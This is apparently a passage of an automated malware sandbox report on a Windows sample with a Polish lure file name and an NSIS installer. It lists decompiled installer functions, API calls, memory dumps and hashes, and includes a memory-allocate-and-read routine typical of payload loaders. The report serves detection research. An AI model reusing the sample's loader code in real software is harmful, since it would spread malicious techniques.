                                                  • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
                                                  • ExitProcess.KERNEL32 ref: 0040353A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                  • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$Xy$\Temp$egkwshqw Setup$~nsu
                                                  • API String ID: 3469842172-2001404842
                                                  • Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                                  • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                                                  • Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                                  • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004054EC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040579B(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42eca8 =  *0x42eca8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405BC7(0x42b0a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405701(_t72);
					} else {
						lstrcatA(0x42b0a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405BC7(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040587F(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404EB3(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42eca8 =  *0x42eca8 + 1;
										} else {
											E00404EB3(0xfffffff1, _t72);
											E00405915(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054EC(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42b0a8 - 0x5c;
					if( *0x42b0a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405EC2(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004056BA(_t72);
							E0040587F(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404EB3(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404EB3(0xfffffff1, _t72);
							return E00405915(__eflags, _t72, 0);
						}
						L33:
						 *0x42eca8 =  *0x42eca8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                  0x004054f7
                                                  0x004054fb
                                                  0x00405504
                                                  0x00405507
                                                  0x0040550a
                                                  0x00405512
                                                  0x00405514
                                                  0x00405515
                                                  0x00000000
                                                  0x00405515
                                                  0x00405524
                                                  0x00405524
                                                  0x00405527
                                                  0x0040552a
                                                  0x0040553e
                                                  0x00405545
                                                  0x0040554a
                                                  0x0040554c
                                                  0x0040555c
                                                  0x0040554e
                                                  0x00405554
                                                  0x00405554
                                                  0x00405561
                                                  0x00405564
                                                  0x0040556f
                                                  0x00405575
                                                  0x0040557a
                                                  0x0040558a
                                                  0x0040558c
                                                  0x00405592
                                                  0x00405595
                                                  0x00405598
                                                  0x00405655
                                                  0x00405655
                                                  0x00405659
                                                  0x0040565b
                                                  0x0040565b
                                                  0x0040565b
                                                  0x0040565b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040559e
                                                  0x0040559e
                                                  0x004055a7
                                                  0x004055ad
                                                  0x004055b2
                                                  0x004055b5
                                                  0x004055b7
                                                  0x004055bb
                                                  0x004055bd
                                                  0x004055bd
                                                  0x004055bb
                                                  0x004055c0
                                                  0x004055c3
                                                  0x004055d6
                                                  0x004055d8
                                                  0x004055dd
                                                  0x004055e4
                                                  0x004055fc
                                                  0x00405602
                                                  0x00405608
                                                  0x0040560a
                                                  0x0040562f
                                                  0x0040560c
                                                  0x0040560c
                                                  0x00405610
                                                  0x00405624
                                                  0x00405612
                                                  0x00405615
                                                  0x0040561d
                                                  0x0040561d
                                                  0x00405610
                                                  0x004055e6
                                                  0x004055ec
                                                  0x004055ee
                                                  0x004055f4
                                                  0x004055f4
                                                  0x004055ee
                                                  0x00000000
                                                  0x004055e4
                                                  0x004055c5
                                                  0x004055c8
                                                  0x004055ca
                                                  0x00000000
                                                  0x00000000
                                                  0x004055cc
                                                  0x004055ce
                                                  0x00000000
                                                  0x00000000
                                                  0x004055d0
                                                  0x004055d4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405634
                                                  0x0040563e
                                                  0x00405644
                                                  0x00405644
                                                  0x0040564f
                                                  0x00000000
                                                  0x0040564f
                                                  0x00405566
                                                  0x0040556d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040552c
                                                  0x0040552c
                                                  0x0040552e
                                                  0x0040565f
                                                  0x00405662
                                                  0x00405665
                                                  0x004056b7
                                                  0x004056b7
                                                  0x004056b7
                                                  0x00405667
                                                  0x0040566a
                                                  0x00405675
                                                  0x0040567a
                                                  0x0040567c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040567f
                                                  0x00405685
                                                  0x0040568b
                                                  0x00405691
                                                  0x00405693
                                                  0x00000000
                                                  0x004056af
                                                  0x00405695
                                                  0x00405699
                                                  0x00000000
                                                  0x00000000
                                                  0x0040569e
                                                  0x00000000
                                                  0x004056a5
                                                  0x0040566c
                                                  0x0040566c
                                                  0x00000000
                                                  0x0040566c
                                                  0x00405534
                                                  0x00405538
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405538

                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
                                                  • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
                                                  • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
                                                  • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
                                                  • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
                                                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
                                                  • FindClose.KERNEL32(?), ref: 0040564F
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004054F6
                                                  • \*.*, xrefs: 0040554E
                                                  • "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" , xrefs: 004054EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-4194315094
                                                  • Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                  • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                                                  • Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                  • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10015406, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100154E0
                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16,1001534D), ref: 1001550A
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16), ref: 10015521
                                                  • VirtualAlloc.KERNELBASE(00000000,10003A94,00003000,00000004,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16,1001534D), ref: 10015543
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,000000FF,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16,1001534D,00000000,00000000), ref: 100155B6
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,000000FF,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16,1001534D), ref: 100155C1
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16,1001534D,00000000), ref: 1001560C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                  • String ID:
                                                  • API String ID: 656311269-0
                                                  • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                  • Instruction ID: be604c5f9bc48b9018abf98c0b0f8c1a8723c06fec892b860f8cc16a0d14625b
                                                  • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                  • Instruction Fuzzy Hash: 8161BD34E00708EBDB10DBA4D895BAEBBBAEF48651F248019F911EF290DB71DD818B54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10003770, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 255memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Heap$AllocateProcessProtectVirtual
                                                  • String ID: @
                                                  • API String ID: 1791181427-2766056989
                                                  • Opcode ID: 23ce1d4863a3dd71f9d5da21c6f6f24ee37ec8926ca1f29359c45b0b9d6f69f9
                                                  • Instruction ID: 208f6a4299a1f7e12c96a0e85f374d3c721a78b09b1983f47698f4133cb92821
                                                  • Opcode Fuzzy Hash: 23ce1d4863a3dd71f9d5da21c6f6f24ee37ec8926ca1f29359c45b0b9d6f69f9
                                                  • Instruction Fuzzy Hash: A2B1D926E191E88ACF068BBD44629EEBFF15F5E191F0D058AECD177382C5A05C04DBB6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405EC2, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405EC2(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0f0;
			}




                                                  0x00405ecd
                                                  0x00405ed6
                                                  0x00000000
                                                  0x00405ee3
                                                  0x00405ed9
                                                  0x00000000

                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
                                                  • FindClose.KERNEL32(00000000), ref: 00405ED9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                  • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                                                  • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                  • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004039B0, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42a084 = _t35;
					if(_t115 == 0x110) {
						 *0x42ec28 = _t125;
						 *0x42a098 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429060 = _t91;
						E00403E83(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e408); // executed
						 *0x42e3ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a084 = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42ec40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403ECF(0x40b);
						while(1) {
							_t37 =  *0x42a084;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x42ec44; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e3ec - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42ec44; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E83(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ecac - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403EA5(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x429060, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ecac - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x42a098);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x429060);
							}
							E00403EB8();
							E00405BC7(0x42a0a0, "egkwshqw Setup");
							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x42a0a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e3f8);
									 *0x429870 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e3f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E83(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e3ec - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e3f8, 8);
									E00403ECF(0x405);
									goto L58;
								}
								__eflags =  *0x42ecac - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42eca0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e3f8);
						 *0x42ec28 = _t133;
						EndDialog(_t125,  *0x429468);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
						__eflags =  *0x42e3ec - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EEA(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ecac - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x429468 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E5C();
											goto L26;
										}
										E0040140B(_t127);
										 *0x429468 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e3f8);
						 *0x42e3f8 = _a12;
						L58:
						if( *0x42b0a0 == _t133) {
							_t142 =  *0x42e3f8 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42b0a0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                  0x004039b9
                                                  0x004039c2
                                                  0x00403b03
                                                  0x00403b07
                                                  0x00403b0b
                                                  0x00403b0d
                                                  0x00403b12
                                                  0x00403b1d
                                                  0x00403b28
                                                  0x00403b2d
                                                  0x00403b2f
                                                  0x00403b31
                                                  0x00403b34
                                                  0x00403b39
                                                  0x00403b47
                                                  0x00403b54
                                                  0x00403b5b
                                                  0x00403b5b
                                                  0x00403b5c
                                                  0x00403b5c
                                                  0x00403b61
                                                  0x00403b67
                                                  0x00403b6e
                                                  0x00403b74
                                                  0x00403b76
                                                  0x00403bb6
                                                  0x00403bbb
                                                  0x00403bc0
                                                  0x00403bc0
                                                  0x00403bc5
                                                  0x00403bce
                                                  0x00403bd0
                                                  0x00403bd5
                                                  0x00403bdb
                                                  0x00403bdf
                                                  0x00403bdf
                                                  0x00403be4
                                                  0x00403bea
                                                  0x00000000
                                                  0x00000000
                                                  0x00403bf0
                                                  0x00403bf5
                                                  0x00403bfb
                                                  0x00000000
                                                  0x00000000
                                                  0x00403c04
                                                  0x00403c0c
                                                  0x00403c11
                                                  0x00403c14
                                                  0x00403c1a
                                                  0x00403c1f
                                                  0x00403c22
                                                  0x00403c28
                                                  0x00403c2d
                                                  0x00403c30
                                                  0x00403c36
                                                  0x00403c3e
                                                  0x00403c44
                                                  0x00403c4a
                                                  0x00403c4e
                                                  0x00403c55
                                                  0x00403c55
                                                  0x00403c55
                                                  0x00403c5f
                                                  0x00403c71
                                                  0x00403c7d
                                                  0x00403c82
                                                  0x00403c8c
                                                  0x00403c92
                                                  0x00403c94
                                                  0x00403c99
                                                  0x00403c96
                                                  0x00403c96
                                                  0x00403c96
                                                  0x00403ca9
                                                  0x00403cc1
                                                  0x00403cc3
                                                  0x00403cc9
                                                  0x00403cde
                                                  0x00403ccb
                                                  0x00403cd4
                                                  0x00403cd6
                                                  0x00403cd6
                                                  0x00403ce4
                                                  0x00403cf4
                                                  0x00403d05
                                                  0x00403d0c
                                                  0x00403d12
                                                  0x00403d16
                                                  0x00403d1b
                                                  0x00403d1d
                                                  0x00000000
                                                  0x00403d23
                                                  0x00403d23
                                                  0x00403d25
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d2b
                                                  0x00403d2f
                                                  0x00403d54
                                                  0x00403d5a
                                                  0x00403d60
                                                  0x00403d62
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d88
                                                  0x00403d8e
                                                  0x00403d90
                                                  0x00403d95
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d9b
                                                  0x00403d9e
                                                  0x00403da1
                                                  0x00403db8
                                                  0x00403dc4
                                                  0x00403ddd
                                                  0x00403de3
                                                  0x00403de7
                                                  0x00403dec
                                                  0x00403df2
                                                  0x00000000
                                                  0x00000000
                                                  0x00403dfc
                                                  0x00403e07
                                                  0x00000000
                                                  0x00403e07
                                                  0x00403d31
                                                  0x00403d37
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d3d
                                                  0x00403d43
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d49
                                                  0x00403d1d
                                                  0x00403e14
                                                  0x00403e20
                                                  0x00403e27
                                                  0x00000000
                                                  0x00403b78
                                                  0x00403b78
                                                  0x00403b7b
                                                  0x00403bae
                                                  0x00403bae
                                                  0x00403bb0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403bb0
                                                  0x00403b7d
                                                  0x00403b81
                                                  0x00403b86
                                                  0x00403b88
                                                  0x00000000
                                                  0x00000000
                                                  0x00403b98
                                                  0x00403ba0
                                                  0x00000000
